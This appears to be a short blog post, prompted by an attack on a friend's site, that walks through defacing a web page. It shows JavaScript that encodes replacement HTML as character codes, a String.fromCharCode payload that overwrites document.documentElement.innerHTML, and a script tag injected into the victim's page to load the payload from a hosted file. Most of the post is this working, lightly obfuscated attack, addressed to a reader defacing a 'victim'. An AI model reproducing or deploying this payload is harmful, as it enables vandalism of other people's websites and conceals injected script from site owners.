It can be use for convert someone's web page into different page without redirecting.
Some hackers used this to deface my friend's web site.
Let's say you have a web page as follow.
<html>
<head></head>
<body>
<h1>Test</h1>
</body></html>
For testing purpose let's imagine it just print "Test" on the browser. And you need to deface this confusing victim. For this first you need to create code of the web page you are going to put after defaced. Let's say it as follows.
<http>
<head>
<title>test err</title>
</head>
<body>
This is test hack
</body>
</html>
You change what print on browser and also the title. To do this we need first convert these characters into their ascii char code. For this run following code as a javascript
var tsstr = `<http>
<head>
<title>test err</title>
</head>
<body>
This is test hack
</body>
</html> `; // The code of the page you need to create
var rettext=""
for (i=0; i<tsstr.length; i++){
var n = tsstr.charCodeAt(i);
var fulstr = n+',';
rettext += fulstr;
}
console.log(rettext);
This will print char codes of the code in console. You should copy it and add it to bellow code.
document.documentElement.innerHTML=String.fromCharCode(Coppied numbers)
It will be as follow according to our example.
document.documentElement.innerHTML=String.fromCharCode(60,104,116,116,112,62,10,60,104,101,97,100,62,10,60,116,105,116,108,101,62,116,101,115,116,32,101,114,114,60,47,116,105,116,108,101,62,10,60,47,104,101,97,100,62,10,60,98,111,100,121,62,10,84,104,105,115,32,105,115,32,116,101,115,116,32,104,97,99,107,10,60,47,98,111,100,121,62,10,60,47,104,116,109,108,62,32)
Copy only this code into a text and save it as a text file. (test.txt) This file should be some where on the internet where the victim's connection can be accessed.
Now we can change victim's source code inorder to change the page.
<html>
<head>
</head>
<body>
<h1>Test</h1>
<script type="text/javascript" src="testhead.txt"> </script>
</body>
</html>
As you can see we have added script tag to refer our created malicious code. Now when ever user load this page they will be shown our page that we created.
Note : This is what hackers did. But without using char ascii codes you can just put innerHTML as normal string.
document.documentElement.innerHTML="<http><head><title>test err2</title></head><body>This is test hack2</body></html>"
No comments:
Post a Comment